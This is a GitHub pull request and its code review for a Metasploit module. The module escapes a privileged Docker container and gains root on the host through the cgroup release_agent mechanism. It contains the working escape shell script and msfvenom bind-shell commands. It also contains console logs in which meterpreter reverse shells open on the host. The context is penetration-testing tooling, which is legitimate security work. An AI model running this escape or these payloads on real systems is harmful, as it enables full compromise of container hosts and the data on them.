### PR TITLE
Added Module: priviledged docker container escape

### PR DESCRIPTION
**Pull request by stealthcopter**
New module: Docker Privileged Container Escape that obtains root on the host machine from a privileged docker container by abusing the Linux cgroup notification on release feature.

## Creating A Testing Environment

- Install Docker
- Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host)
```bash
docker run -d -it --name test-vuln-container -p 4444:4444 --privileged ubuntu
```
- Obtain a shell on the container with metasploit. One possible option is:
```bash
# Create a bind shell using msfvenom
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o ./bind4444.bin
# Copy bind shell into container
docker cp ./bind4444.bin test-vuln-container:/bind4444.bin
# Execute bind shell in the container
docker exec -it test-vuln-container /bind4444.bin
```
- Connect to this bind shell in metasploit
```bash
use multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 127.0.0.1
set lport 4444
run
```

## Verification Steps

1. `use exploit/linux/local/docker_privileged_container_escape`
2. `set SESSION [session]`
3. `set PAYLOAD [payload]`
4. `set LHOST [lhost]`
5. `set LPORT [lport]`
6. `exploit`

### Container Escape starting with a meterpreter shell

```
msf5 exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape
msf5 exploit(linux/local/lxc_privilege_escalation) > set session 1
session => 1
msf5 exploit(linux/local/lxc_privilege_escalation) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Writing payload executable to '/tmp/aLQdBKpMXLo'
[*] Executing script to exploit privileged container
[*] Sending stage (3012516 bytes) to 192.168.0.231
[*] Meterpreter session 4 opened (0.0.0.0:0 -> 192.168.0.231:4444) at 2020-07-19 14:50:51 +0100
```

### CODE REVIEW

File: documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md [hunk 1]
```diff
@@ -0,0 +1,78 @@
...
+
+## ForcePayloadSearch
+
+Force the exploit to search for the payload in the file system rather than copying out of the docker container. This avoids the need for a writable directory on the host system. Typically, the filesystem of the container will be located in the `/var/lib/docker/overlay2/` directory.
+
+## WritableContainerDir
+
+A directory where we can write files inside the container (default is /tmp). This is needed to drop the payload into the container.
+
+## WritableContainerDir
```
Comment (bcoles) [inline documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md:59]:
```suggestion
## WritableHostDir
```

File: modules/exploits/linux/local/docker_privileged_container_escape.rb [hunk 2]
```diff
@@ -0,0 +1,159 @@
...
+    id = cmd_exec('basename $(cat /proc/1/cpuset)').chomp
+    unless id.match(/\A[\h]{64}\z/).nil?
+      id
+    end
+  end
+
+  # Check we have all the prerequisites to perform the escape
+  def check
+    # are in a docker container
+    unless cmd_exec('test -f /.dockerenv && echo true') =~ /true$/
```
Comment (bcoles) [inline modules/exploits/linux/local/docker_privileged_container_escape.rb:72]: The `Msf::Post::File` mixin has a `file?` method for this purpose.

```suggestion
    unless file?('/.dockerenv')
```

File: modules/exploits/linux/local/docker_privileged_container_escape.rb [hunk 3]
```diff
@@ -0,0 +1,159 @@
...
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
```
Comment (bcoles) [inline modules/exploits/linux/local/docker_privileged_container_escape.rb:97]: The `AutoCheck` mixin can take care of this automatically. All you would need to do is add `prepend Msf::Exploit::Remote::AutoCheck` at the start of the module (before the `include` lines) and you'll get automagic checking for free. If the operator wants to bypass the AutoCheck and proceed with exploitation even when the check fails, they can `set ForceExploit true`. The `ForceExploit` module option should also be removed, as this is provided automatically by `AutoCheck`.

```suggestion
```

File: modules/exploits/linux/local/docker_privileged_container_escape.rb [hunk 4]
```diff
@@ -0,0 +1,159 @@
...
+    unless id.match(/\A[\h]{64}\z/).nil?
+      id
+    end
+  end
+
+  # Check we have all the prerequisites to perform the escape
+  def check
+    # are in a docker container
+    unless cmd_exec('test -f /.dockerenv && echo true') =~ /true$/
+      return Exploit::CheckCode::Safe('Not inside a Docker container, use ForceExploit to override')
```
Comment (bcoles) [inline modules/exploits/linux/local/docker_privileged_container_escape.rb:73]: `use ForceExploit to override` is implied. It is also printed when the `AutoCheck` mixin is used.

```suggestion
      return CheckCode::Safe('Not inside a Docker container')
```

File: modules/exploits/linux/local/docker_privileged_container_escape.rb [hunk 5]
```diff
@@ -0,0 +1,159 @@
...
+      return Exploit::CheckCode::Safe('Exploit requires root inside container')
+    end
+
+    # are rdma files present in /sys/
+    path = cmd_exec('ls -x /s*/fs/c*/*/r* | head -n1')
+    unless path.start_with? '/'
+      return Exploit::CheckCode::Safe('Required /sys/ files for exploitation not found, possibly old version of docker or not a privileged container.')
+    end
+
+    Exploit::CheckCode::Vulnerable('Inside Docker container and target appears vulnerable')
```
Comment (bcoles) [inline modules/exploits/linux/local/docker_privileged_container_escape.rb:87]:
```suggestion
    CheckCode::Appears('Inside Docker container and target appears vulnerable')
```

File: modules/exploits/linux/local/docker_privileged_container_escape.rb (hunk 3 above)
Comment (stealthcopter) [reply modules/exploits/linux/local/docker_privileged_container_escape.rb:97]: @bcoles ah this is good to know, thanks! I had copied it from a similar module: [docker_daemon_privilege_escalation.rb](https://github.com/rapid7/metasploit-framework/blob/016e2bdf155560805e86d56e50da2a0bf7e06199/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb#L53)

Comment (bcoles) [reply modules/exploits/linux/local/docker_privileged_container_escape.rb]: The `AutoCheck` mixin is new.

Comment (stealthcopter) [reply modules/exploits/linux/local/docker_privileged_container_escape.rb]: cool, will update now

File: modules/exploits/linux/local/docker_privileged_container_escape.rb [hunk 6]
```diff
@@ -0,0 +1,153 @@
...
+      echo 1 >"$d/w/notify_on_release"
+      t="$(sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab)"
+      touch /o
+      echo "$t/c" >"$d/release_agent"
+      printf "#!/bin/sh\\n%s > %s/o" "#{command}" "$t">/c
+      chmod +x /c
+      sh -c "echo 0 >$d/w/cgroup.procs"
+      sleep 1
+      cat /o
+      rm /c /o
```
Comment (acammack-r7) [inline modules/exploits/linux/local/docker_privileged_container_escape.rb:150]: Would it be possible to randomize some of these file names like we do the for the base executable?

File: modules/exploits/linux/local/docker_privileged_container_escape.rb [hunk 7]
```diff
@@ -0,0 +1,153 @@
...
+
+    pl = generate_payload_exe
+    exe_path = "#{base_dir_container}/#{rand_text_alpha(6..11)}"
+    print_status("Writing payload executable to '#{exe_path}'")
+
+    write_file(exe_path, pl)
+    register_file_for_cleanup(exe_path)
+
+    print_status('Executing script to exploit privileged container')
+    vprint_status(cmd_exec("chmod +x #{exe_path}"))
```
Comment (acammack-r7) [inline modules/exploits/linux/local/docker_privileged_container_escape.rb:104]: There's a method that does both the upload and chmod called `upload_and_chmodx` that should work here.

**Review by acammack-r7 — COMMENTED** [review]
I always love container escapes! I have a couple suggestions to make the module a little cleaner.

File: modules/exploits/linux/local/docker_privileged_container_escape.rb (hunk 7 above)
Comment (stealthcopter) [reply modules/exploits/linux/local/docker_privileged_container_escape.rb:104]: cool, thanks for the tip!

File: modules/exploits/linux/local/docker_privileged_container_escape.rb (hunk 6 above)
Comment (stealthcopter) [reply modules/exploits/linux/local/docker_privileged_container_escape.rb:150]: yup, I'll get on that!

**Comment by bwatters-r7** [comment]
```
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:5555 
[*] Sending stage (3012516 bytes) to 192.168.134.163
[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.134.163:42832) at 2020-08-03 16:26:07 -0500

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 4.15.0-50-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: no-user @ e2eccce69f6d (uid=0, gid=0, euid=0, egid=0)
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape 
[*] No payload configured, defaulting to linux/armle/meterpreter/reverse_tcp
msf5 exploit(linux/local/docker_privileged_container_escape) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/docker_privileged_container_escape) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(linux/local/docker_privileged_container_escape) > set lport 4567
lport => 4567
msf5 exploit(linux/local/docker_privileged_container_escape) > set verbose true
verbose => true
msf5 exploit(linux/local/docker_privileged_container_escape) > show options

Module options (exploit/linux/local/docker_privileged_container_escape):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT  4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/local/docker_privileged_container_escape) > set session 1
session => 1
msf5 exploit(linux/local/docker_privileged_container_escape) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
[*] Writing payload executable to '/tmp/CapWCGIpZ'
[*] Writing '/tmp/CapWCGIpZ' (286 bytes) ...
[*] Executing script to exploit privileged container
[*] container id e2eccce69f6da0e386ea77caf36281e88d4f33d4bb2600fc457240dc0e016396
[*] Found container id e2eccce69f6da0e386ea77caf36281e88d4f33d4bb2600fc457240dc0e016396, copying payload to host
[*] docker cp e2eccce69f6da0e386ea77caf36281e88d4f33d4bb2600fc457240dc0e016396:/tmp/CapWCGIpZ /tmp/CapWCGIpZ; /tmp/CapWCGIpZ
[*] Script: d=$(dirname "$(ls -x /s*/fs/c*/*/r* | head -n1)");mkdir -p "$d/LWssjtKV";echo 1 >"$d/LWssjtKV/notify_on_release";t="$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)";touch /DjuErFcq;echo "$t/clnwop" >"$d/release_agent";printf "#!/bin/sh\n%s > %s/DjuErFcq" "docker cp e2eccce69f6da0e386ea77caf36281e88d4f33d4bb2600fc457240dc0e016396:/tmp/CapWCGIpZ /tmp/CapWCGIpZ; /tmp/CapWCGIpZ" "$t">/clnwop;chmod +x /clnwop;sh -c "echo 0 >$d/LWssjtKV/cgroup.procs";sleep 1;cat /DjuErFcq;rm /clnwop /DjuErFcq
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012516 bytes) to 192.168.134.163
[*] Meterpreter session 2 opened (192.168.135.168:4567 -> 192.168.134.163:34702) at 2020-08-03 16:27:43 -0500
[+] Deleted /tmp/CapWCGIpZ
[*] 
[*] Waiting 20s for payload

meterpreter > sysinfo
Computer     : 192.168.134.163
OS           : Ubuntu 18.04 (Linux 4.15.0-50-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

**Comment by bwatters-r7** [comment]
# Release Notes
This PR adds a Docker container escape that obtains root on the host machine from a privileged docker container by abusing the Linux cgroup notification on release feature.

**Comment by stealthcopter** [comment]
@bwatters-r7 awesome thanks for your help!

**Pull request merged**